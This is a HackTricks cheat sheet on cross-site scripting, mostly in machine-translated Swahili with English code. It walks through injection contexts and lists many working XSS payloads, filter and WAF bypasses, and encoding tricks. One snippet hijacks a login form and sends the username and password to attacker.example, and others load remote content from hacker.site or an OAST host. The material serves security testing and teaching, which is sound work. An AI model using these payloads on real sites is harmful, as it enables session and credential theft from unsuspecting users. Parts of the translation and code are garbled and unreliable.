XSS (Cross Site Scripting)

Reading time: 54 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Mbinu

Angalia kama thamani yoyote unayodhibiti (parameters, path, headers?, cookies?) ina inaakisiwa kwenye HTML au inatumika na JS code.
Tafuta muktadha ambapo imeakisiwa/inatumika.
Ikiwa imeakisiwa
Angalia ni alama gani unaweza kutumia na kulingana na hilo, andaa payload:
Katika raw HTML:
Je, unaweza kuunda new HTML tags?
Je, unaweza kutumia events au attributes zinazounga mkono protocol ya javascript:?
Je, unaweza bypass kinga?
Je, HTML content inaelezwa na engine yoyote ya client side JS (AngularJS, VueJS, Mavo...)? Unaweza kuabusu Client Side Template Injection.
Ikiwa huwezi kuunda HTML tags zinazotekeleza JS code, je, unaweza kuabusu Dangling Markup - HTML scriptless injection?
Ndani ya HTML tag:
Je, unaweza kutoka kwenye attribute na kutoka kwenye tag (basi utakuwa kwenye raw HTML) na kuunda new HTML tag ya kuabusu?
Je, unaweza kuunda new events/attributes za kutekeleza JS code?
Je, attribute ambamo umekwama inaunga mkono utekelezaji wa JS?
Je, unaweza bypass kinga?
Ndani ya JavaScript code:
Je, unaweza kutoka kwenye <script> tag?
Je, unaweza kutoroka string na kuendesha JS code tofauti?
Je, input zako ziko katika template literals ``?
Je, unaweza bypass kinga?
Javascript function inayo tekelezwa
Unaweza kutaja jina la function ya kutekeleza. mfano: ?callback=alert(1)
Ikiwa inatumika:
Unaweza kufaida DOM XSS, zingatia jinsi input yako inavyozimiliwa na ikiwa input yako inayodhibitiwa inatumiwa na sink yoyote.

Unapofanya kazi kwenye XSS tata unaweza kupata inavutia kujua kuhusu:

Debugging Client Side JS

Thamani zilizoreflektwa

Ili kufaida XSS kwa mafanikio kitu cha kwanza unachotakiwa kupata ni thamani unayodhibiti ambayo inaakisiwa kwenye ukurasa wa wavuti.

Intermediately reflected: Ikiwa unagundua thamani ya parameter au hata path inaakisiwa kwenye ukurasa wa wavuti unaweza kufaida Reflected XSS.
Stored and reflected: Ikiwa unagundua thamani unayodhibiti imehifadhiwa kwenye server na inaakisiwa kila ukitembelea ukurasa unaweza kufaida Stored XSS.
Accessed via JS: Ikiwa unagundua thamani unayodhibiti inafikiwa kwa kutumia JS unaweza kufaida DOM XSS.

Muktadha

Unapojaribu kufaida XSS jambo la kwanza unalotakiwa kujua ni wapi input yako inaakisiwa. Kulingana na muktadha, utaweza kutekeleza JS kode kwa njia tofauti.

Ikiwa input yako inaakisiwa kwenye raw HTML ukurasa utahitaji kuabusu baadhi ya HTML tag ili kutekeleza JS code: <img , <iframe , <svg , <script ... hizi ni baadhi tu ya tag nyingi za HTML unazoweza kutumia.
Pia, kumbuka Client Side Template Injection.

Ndani ya attribute za HTML tag

Ikiwa input yako inaakisiwa ndani ya thamani ya attribute ya tag unaweza kujaribu:

Kutoka kwenye attribute na kutoka kwenye tag (basi utakuwa kwenye raw HTML) na kuunda new HTML tag ya kuabusu: "><img [...]
Ikiwa unaweza kutoka kwenye attribute lakini si kutoka kwenye tag (> imeencoded au imeondolewa), kulingana na tag unaweza kuunda event inayotekeleza JS code: " autofocus onfocus=alert(1) x="
Ikiwa huwezi kutoka kwenye attribute (" imeencoded au imeondolewa), basi kulingana na attribute gani thamani yako inaakisiwa ndani yake ikiwa unadhibiti thamani yote au sehemu tu utaweza kuiabusu. Kwa mfano, ikiwa unadhibiti event kama onclick= utaweza kuifanya itekeleze code yoyote inapobofuliwa. Mfano mwingine wa kuvutia ni attribute href, ambapo unaweza kutumia protocol ya javascript: kutekeleza code yoyote: href="javascript:alert(1)"
Ikiwa input yako inaakisiwa ndani ya "unexpoitable tags" unaweza kujaribu mbinu ya accesskey kuabusu vuln (utahitaji aina ya social engineering kuifaidika): " accesskey="x" onclick="alert(1)" x="

Mfano la ajabu la Angular kutekeleza XSS ikiwa unadhibiti jina la class:

html

<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>

Ndani ya JavaScript code

Katika kesi hii, kiingilio chako kinafunuliwa kati ya <script> [...] </script> tags za ukurasa wa HTML, ndani ya faili .js au ndani ya attribute inayotumia protocol ya javascript::

Ikiwa kinafunuliwa kati ya <script> [...] </script> tags, hata kama kiingilio chako kiko ndani ya aina yoyote ya quotes, unaweza kujaribu kuchoma </script> na kutoroka kutoka katika muktadha huu. Hii inafanya kazi kwa sababu browser will first parse the HTML tags na kisha yaliyomo, kwa hiyo haitagundua kuwa tagi yako ya </script> iliyochomwa iko ndani ya HTML code.
Ikiwa kinafunuliwa ndani ya JS string na trick ya mwisho haifanyi kazi utahitaji kuondoka kwenye string, kutekeleza code yako na kujenga upya JS code (kama kuna kosa lolote, haitatekelezwa:
'-alert(1)-'
';-alert(1)//
\';alert(1)//
Ikiwa kinafunuliwa ndani ya template literals unaweza kuingiza JS expressions kwa kutumia ${ ... } syntax: var greetings = `Hello, ${alert(1)}`
Unicode encode inafanya kazi kuandika valid javascript code:

javascript

alert(1)
alert(1)
alert(1)

Javascript Hoisting

Javascript Hoisting inaashiria fursa ya kutangaza functions, variables or classes baada ya kutumika ili uweze kutumia vibaya mazingira ambapo XSS inatumia undeclared variables au functions.
Angalia ukurasa ufuatao kwa habari zaidi:

JS Hoisting

Javascript Function

Several web pages have endpoints that accept as parameter the name of the function to execute. A common example to see in the wild is something like: ?callback=callbackFunc.

Njia nzuri ya kugundua ikiwa kitu kinachotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni kubadilisha thamani ya param (kwa mfano kuwa 'Vulnerable') na kuangalia console kwa makosa kama:

Iwapo ni vulnerable, unaweza kuweza kuamsha an alert kwa kutuma thamani: ?callback=alert(1). Hata hivyo, ni kawaida kuwa endpoints hizi zitakuwa zikithibitisha maudhui ili kuruhusu tu letters, numbers, dots na underscores ([\w\._]).

Hata hivyo, hata kwa kizuizi hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia chars hizo halali ili kupata access kwa element yoyote katika DOM:

Some useful functions for this:

firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement

Unaweza pia kujaribu kusababisha Javascript functions moja kwa moja: obj.sales.delOrders.

Hata hivyo, kawaida endpoints zinazotekeleza function iliyotajwa ni endpoints zisizo na DOM nyingi za kuvutia, other pages in the same origin zitakuwa na more interesting DOM za kufanya vitendo zaidi.

Kwa hivyo, ili abuse this vulnerability in a different DOM uhusishaji wa Same Origin Method Execution (SOME) ulitengenezwa:

SOME - Same Origin Method Execution

DOM

Kuna JS code inayotumia kwa njia isiyo salama baadhi ya data controlled by an attacker kama location.href. Mshambulizi anaweza kutumia hili kutekeleza arbitrary JS code.

DOM XSS

Universal XSS

Aina hizi za XSS zinaweza kupatikana anywhere. Hazitegemei tu unyonyaji wa client wa web application bali zinategemea any context. Aina hizi za arbitrary JavaScript execution zinaweza hata kutumiwa kupata RCE, kusoma arbitrary files kwa clients na servers, na mengine mengi.
Baadhi ya examples:

Server Side XSS (Dynamic PDF)

Electron Desktop Apps

WAF bypass encoding image

from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21

Kuingiza ndani ya raw HTML

Wakati input yako inarudishwa inside the HTML page au unaweza kutoroka na kuingiza HTML code katika muktadha huu, jambo la kwanza unalopaswa kufanya ni kuangalia kama unaweza kutumia < kuunda tags mpya: Jaribu tu reflect hiyo char na angalia kama inafanyiwa HTML encoded au deleted au kama inarudishwa without changes. Ni tu katika kesi ya mwisho utaweza ku-exploit hili.
Kwa kesi hizi pia kumbuka Client Side Template Injection.
Kumbuka: Maoni ya HTML yanaweza kufungwa kwa kutumia****-->****au **--!>****

Katika kesi hii na ikiwa hakuna black/whitelisting inatumiwa, unaweza kutumia payloads kama:

html

<script>
alert(1)
</script>
<img src="x" onerror="alert(1)" />
<svg onload=alert('XSS')>

Lakini, ikiwa tags/attributes black/whitelisting inatumika, utahitaji brute-force which tags unaweza kuunda.
Mara utakapogundua which tags are allowed, utahitaji brute-force attributes/events ndani ya tags halali ulizopata ili kuona jinsi unaweza kushambulia muktadha.

Tags/Events brute-force

Nenda kwenye https://portswigger.net/web-security/cross-site-scripting/cheat-sheet na bonyeza Copy tags to clipboard. Kisha, tuma zote kwa kutumia Burp intruder na ukague kama kuna tags ambazo WAF haikutambua kama zenye madhara. Mara utakapogundua tags unazoweza kutumia, unaweza brute force all the events ukitumia tags halali (kwenye ukurasa uleule bonyeza Copy events to clipboard na fuata utaratibu uleule kama awali).

Custom tags

Ikiwa hukupata tag yoyote halali ya HTML, unaweza kujaribu kuunda a custom tag na kutekeleza JS code kwa kutumia attribute ya onfocus. Katika request ya XSS, unahitaji kumalizia URL na # ili kuifanya page focus on that object na execute the code:

/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x

Blacklist Bypasses

Ikiwa aina fulani ya blacklist inatumiwa, unaweza kujaribu ku-bypass kwa mbinu za kuchekesha:

javascript

//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG

//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>

//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09

//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>

//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>

//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //

//Extra open
<<script>alert("XSS");//<</script>

//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">

//Using `` instead of parenthesis
onerror=alert`1`

//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //

Length bypass (small XSSs)

[!NOTE] > Payload za XSS ndogo zaidi kwa mazingira tofauti can be found here and here.

html

<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>

The last one is using 2 unicode characters which expands to 5: telsr
More of these characters can be found here.
To check in which characters are decomposed check here.

Click XSS - Clickjacking

Ikiwa ili kuchochea udhaifu unahitaji mtumiaji kubofya link au form yenye data iliyowekwa awali unaweza kujaribu abuse Clickjacking (ikiwa ukurasa una udhaifu).

Impossible - Dangling Markup

Ikiwa unadhani kwamba haiwezekani kuunda HTML tag yenye attribute inayotekeleza JS code, unapaswa kuangalia Danglig Markup kwa sababu unaweza exploit udhaifu bila kuendesha JS code.

Injecting inside HTML tag

Inside the tag/escaping from attribute value

Ikiwa uko ndani ya HTML tag, jambo la kwanza unaweza kujaribu ni kutoroka kutoka tagi na kutumia baadhi ya mbinu zilizotajwa katika previous section ili kuendesha JS code.
Ikiwa huwezi kutoroka kutoka tagi, unaweza kuunda attributes mpya ndani ya tagi kujaribu kuendesha JS code, kwa mfano ukitumia payload kama ( note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag ):

bash

" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t

Matukio ya mtindo

python

<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>

Ndani ya attribute

Hata kama huwezi kuondoka kutoka katika attribute (" inatafsiriwa au kufutwa), kulingana na attribute gani thamani yako inaonyeshwa ndani yake na ikiwa unadhibiti thamani yote au sehemu tu utaweza kuitumia vibaya. Kwa mfano, ikiwa unadhibiti event kama onclick= utaweza kufanya iitekeleze msimbo wowote inapobonyezwa.
Mfano mwingine wa kuvutia ni attribute href, ambapo unaweza kutumia protocol ya javascript: kuendesha msimbo wowote: href="javascript:alert(1)"

Bypass inside event using HTML encoding/URL encode

Vikundi vya HTML encoded characters ndani ya thamani za attributes za tagi za HTML hubadilishwa tena wakati wa utekelezaji (decoded on runtime). Kwa hiyo kitu kama kilicho hapa chini kitakuwa halali (payload iko kwa bold): <a id="author" href="http://none" onclick="var tracker='http://foo?'-alert(1)-'';">Go Back </a>

Kumbuka kwamba aina yoyote ya HTML encode ni halali:

javascript

//HTML entities
&apos;-alert(1)-&apos;
//HTML hex without zeros
&#x27-alert(1)-&#x27
//HTML hex with zeros
&#x00027-alert(1)-&#x00027
//HTML dec without zeros
&#39-alert(1)-&#39
//HTML dec with zeros
&#00039-alert(1)-&#00039

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">a</a>

Kumbuka kwamba URL encode pia itafanya kazi:

python

<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>

Bypass ndani ya event kwa kutumia Unicode encode

javascript

//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />

Itifaki Maalum ndani ya sifa

Huko unaweza kutumia itifaki javascript: au data: katika maeneo fulani ili kuendesha msimbo wowote wa JS. Baadhi zitahitaji mwingiliano wa mtumiaji; nyingine hazitahitaji.

javascript

javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
javascript:alert(1)
java        //Note the new line
script:alert(1)

data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==

Maeneo ambapo unaweza kuingiza protokoli hizi

Kwa ujumla protokoli ya javascript: inaweza kutumika katika tag yoyote inayokubali attribute href na katika tag nyingi zinazokubali attribute ya src (lakini sio <img>)

html

<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>

<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>

//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">

Mbinu nyingine za obfuscation

Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu ya awali pia ni halali kwa sababu uko ndani ya attribute.

javascript

<a href="javascript:var a='&apos;-alert(1)-&apos;'">

Zaidi ya hayo, kuna njia nyingine nzuri kwa kesi hizi: Hata kama input yako ndani ya javascript:... inakuwa URL encoded, itakuwa URL decoded kabla haijaendeshwa. Kwa hivyo, ikiwa unahitaji escape kutoka kwa string ukitumia single quote na ukaona kwamba inakuwa URL encoded, kumbuka kwamba haina umuhimu, itatafsiriwa kama single quote wakati wa execution.

javascript

&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>

Kumbuka kwamba ikiwa utajaribu kutumia zote mbili URLencode + HTMLencode kwa utaratibu wowote ili ku-encode payload it haita fanya kazi, lakini unaweza kuwachanganya ndani ya payload.

Kutumia Hex na Octal encode na javascript:

Unaweza kutumia Hex na Octal encode ndani ya sifa ya src ya iframe (angalau) kutangaza HTML tags to execute JS:

javascript

//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />

//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />

Reverse tab nabbing

javascript

<a target="_blank" rel="opener"

Ikiwa unaweza kuingiza URL yoyote katika tagi yoyote ya <a href= ambayo ina sifa target="_blank" and rel="opener", angalia ukurasa ufuatao ili exploit tabia hii:

Reverse Tab Nabbing

on Event Handlers Bypass

Kwanza kabisa angalia ukurasa huu (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) kwa "on" event handlers muhimu.
Ikiwa kuna blacklist inayokuzuia kuunda event handlers hizi unaweza kujaribu bypass zifuatazo:

javascript

<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>

//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B

XSS katika "Unexploitable tags" (hidden input, link, canonical, meta)

Kutoka here sasa inawezekana kutumia vibaya hidden inputs kwa:

html

<button popvertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />

Na katika meta tags:

html

<!-- Injection inside meta attribute-->
<meta
name="apple-mobile-web-app-title"
content=""
Twitter
popover
id="newsletter"
onbeforetoggle="alert(2)" />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>

Kutoka hapa: Unaweza kutekeleza XSS payload ndani ya attribute iliyofichwa, mradi unaweza kumshawishi mtu aliyeathirika kubonyeza mchanganyiko wa funguo. Kwenye Firefox kwenye Windows/Linux mchanganyiko wa funguo ni ALT+SHIFT+X na kwenye OS X ni CTRL+ALT+X. Unaweza kubainisha mchanganyiko tofauti wa funguo kwa kutumia funguo tofauti katika access key attribute. Hapa kuna vektori:

html

<input type="hidden" accesskey="X" onclick="alert(1)">

XSS payload itakuwa kitu kama hiki: " accesskey="x" onclick="alert(1)" x="

Blacklist Bypasses

Mbinu kadhaa za kutumia encoding tofauti tayari zilielezwa ndani ya sehemu hii. Rudi kujifunza wapi unaweza kutumia:

HTML encoding (HTML tags)
Unicode encoding (can be valid JS code): \u0061lert(1)
URL encoding
Hex and Octal encoding
data encoding

Bypasses for HTML tags and attributes

Soma the Blacklist Bypasses of the previous section.

Bypasses for JavaScript code

Soma JavaScript bypass blacklist of the following section.

CSS-Gadgets

Ikiwa umegundua XSS katika sehemu ndogo sana ya tovuti ambayo inahitaji aina fulani ya mwingiliano (labda link ndogo kwenye footer yenye onmouseover element), unaweza kujaribu kubadilisha nafasi ambayo kipengele hicho kinachukua ili kuongeza uwezekano wa link itakapoendeshwa.

Kwa mfano, unaweza kuongeza styling katika element kama: position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5

Lakini, ikiwa WAF inachuja style attribute, unaweza kutumia CSS Styling Gadgets, kwa hivyo ikiwa upata, kwa mfano

.test {display:block; color: blue; width: 100%}

#someid {top: 0; font-family: Tahoma;}

Sasa unaweza kubadilisha link yetu na kuileta kwa umbo

<a href="" id=someid class=test onclick=alert() a="">

Njia hii ilichukuliwa kutoka https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703

Injecting inside JavaScript code

Katika kesi hizi, input yako itarejea ndani ya JS code ya .js file au kati ya <script>...</script> tags au kati ya HTML events ambazo zinaweza kutekeleza JS code au kati ya attributes zinazokubali javascript: protocol.

Escaping <script> tag

Ikiwa code yako imeingizwa ndani ya <script> [...] var input = 'reflected data' [...] </script> unaweza kwa urahisi kuepuka kufunga tag ya <script>:

javascript

</script><img src=1 onerror=alert(document.domain)>

Kumbuka kwamba katika mfano huu hatujafunga hata alama ya nukuu moja. Hii ni kwa sababu HTML parsing is performed first by the browser, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwemo blocks za script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizoungwa ndani unafanywa tu baadaye.

Ndani ya JS code

If <> are being sanitised you can still escape the string where your input is being located and execute arbitrary JS. Ni muhimu fix JS syntax, kwa sababu ikiwa kuna makosa, JS code haitatekelezwa:

'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//

JS-in-JS string break → inject → repair pattern

Wakati user input inapoweka ndani ya quoted JavaScript string (kwa mfano, server-side echo into an inline script), unaweza terminate the string, inject code, na repair the syntax ili parsing iendelee kuwa valid. Generic skeleton:

"            // end original string
;            // safely terminate the statement
<INJECTION>  // attacker-controlled JS
; a = "      // repair and resume expected string/statement

Mfano wa muundo wa URL wakati parameter hatarishi unarejeshwa ndani ya JS string:

?param=test";<INJECTION>;a="

Hii inatekeleza attacker JS bila ya kuhitaji kugusa muktadha wa HTML (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati filters zinapozuia maneno muhimu.

Template literals ``

Ili kujenga strings mbali na single na double quotes, JS pia inakubali backticks ``. Hii inajulikana kama template literals kwani zinaruhusu embedded JS expressions kwa kutumia sintaksia ${ ... }.\
Kwa hivyo, ikiwa ugundua kwamba input yako inarudishwa ndani ya JS string inayotumia backticks, unaweza kuiba sintaksia ${ ... } kutekeleza arbitrary JS code:

Hii inaweza kutumiwa vibaya kwa kutumia:

javascript

;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`

javascript

// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop() {
return loop
}
loop``

Utekelezaji wa msimbo uliokodishwa

html

<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>alert(1)</script></svg>  <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">

Deliverable payloads na eval(atob()) na nuances za scope

Ili kufanya URLs ziwe fupi na kuzuia vichujio vya maneno rahisi, unaweza base64-encode mantiki yako halisi na kuievaluate kwa kutumia eval(atob('...')). Ikiwa uchujaji rahisi wa maneno utaizuia vitambulisho kama alert, eval, au atob, tumia vitambulisho vilivyofichwa kwa Unicode (Unicode-escaped) ambavyo vinakompaili sawa kwenye browser lakini vinaepuka vichujio vinavyoendana na mnyororo wa herufi:

\u0061\u006C\u0065\u0072\u0074(1)                      // alert(1)
\u0065\u0076\u0061\u006C(\u0061\u0074\u006F\u0062('BASE64'))  // eval(atob('...'))

Tofauti muhimu ya wigo: const/let zinazotangazwa ndani ya eval() zina wigo la block na HAZI za kuunda variables globali; hazitapatikana kwa scripts zinazofuata. Tumia elementi ya <script> iliyotiwa kwa dynamic ili kufafanua hooks globali, zisizoweza kubadilishwa pale zinapohitajika (kwa mfano, to hijack a form handler):

javascript

var s = document.createElement('script');
s.textContent = "const DoLogin = () => {const pwd = Trim(FormInput.InputPassword.value); const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));}";
document.head.appendChild(s);

Marejeleo: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

Kodisha Unicode (utekelezaji wa JS)

javascript

alert(1)
alert(1)
alert(1)

Mbinu za kuepuka blacklist za JavaScript

Strings

javascript

"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))

Mfuatano maalum wa kutoroka

javascript

"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
// Any other char escaped is just itself

Ubadilishaji wa nafasi ndani ya JS code

javascript

<TAB>
/**/

JavaScript comments (kutoka JavaScript Comments njia)

javascript

//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line

Mistari mipya ya JavaScript (kutoka JavaScript new line njia)

javascript

//Javascript interpret as new line these chars:
String.fromCharCode(10)
alert("//\nalert(1)") //0x0a
String.fromCharCode(13)
alert("//\ralert(1)") //0x0d
String.fromCharCode(8232)
alert("//\u2028alert(1)") //0xe2 0x80 0xa8
String.fromCharCode(8233)
alert("//\u2029alert(1)") //0xe2 0x80 0xa9

Nafasi tupu za JavaScript

javascript

log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279

//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert&#65279;(1)>

Javascript ndani ya maoni

javascript

//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send

//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com

JavaScript bila mabano

javascript

// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name

// Backtips
// Backtips pass the string as an array of lenght 1
alert`1`

// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`

// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`

//It's possible to construct a function and call it
Function`x${'alert(1337)'}x`

// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead

// Using Reflect.apply to call any function with any argumnets
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.



// valueOf, toString
